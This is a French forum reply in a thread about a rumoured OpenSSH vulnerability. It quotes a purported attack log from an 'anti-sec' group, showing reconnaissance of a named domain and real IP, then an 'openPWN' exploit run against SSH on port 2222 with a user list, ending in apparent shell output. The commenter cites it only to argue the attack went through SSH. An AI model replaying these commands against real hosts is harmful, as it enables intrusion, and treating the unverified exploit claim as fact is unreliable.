• [^] # Re: Un rapport avec ceci?

    Posté par . En réponse au journal Faille OpenSSH : qu'une rumeur mais.... Évalué à 2.

    C'est pas ce que dit le récit/log de l'attaque :

    anti-sec:~/pwn# ./infoz infosec.org.uk

    IP: 66.96.220.213
    NS:
    - ns1.webhostline.com
    - ns2.webhostline.com
    Mail Server:
    - 66.96.220.213 > 6696220213.hostnoc.net
    WWW Server:
    Apache
    SSH Banner:
    SSH-2.0-OpenSSH_4.3 : PORT 2222

    anti-sec:~/pwn# cd xpl/

    anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt

    [+] openPWN - anti-sec group
    [+] Target: 66.96.220.213
    [+] SSH Port: 2222
    [+] List: users.txt

    [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

    user: crownvip
    uname: Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux


    Manifestement, si le "log" (partiel) est bien celui de l'attaque, c'était bien un apache et c'est sur le port SSH que s'est déroulé l'attaque...

    à moins que tu n'es d'autres sources à nous faire partager ;-)